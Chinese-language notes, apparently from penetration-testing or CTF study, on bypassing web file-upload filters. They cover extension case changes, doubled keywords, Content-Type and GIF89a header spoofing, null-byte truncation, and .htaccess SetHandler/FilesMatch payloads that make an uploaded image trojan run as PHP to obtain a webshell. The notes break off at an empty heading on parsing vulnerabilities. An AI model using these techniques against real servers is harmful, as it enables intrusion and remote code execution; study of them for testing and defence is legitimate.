1遇到文件上传先抓包,尝试修改后缀大小写,关键字替换为空1.pphphp,修改Content-Type加上gif文件头信息gif89a 和00截断.
基本修改以下3处还有截断
还有一种是在路径处截断
2.htaccess文件上传拿shell
1.创建htaccess文件,编辑内容为: SetHandler application/x-httpd-php 然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。 2.编辑内容为: <Files demo.jpg> ForceType application/x-httpd-php SetHandler application/x-httpd-php </Files> 指定文件名的文件,才能被当做PHP解析.
----------例子
先上传图片马
然后上传写好的.htaccess文件
上传123.htaccess用burpsuit抓包改为.htaccess
<FilesMatch "yi.jpg"> //这里填上传的jpg文件名,会当成php解析 SetHandler application/x-httpd-php </FilesMatch>
成功解析
3.解析漏洞
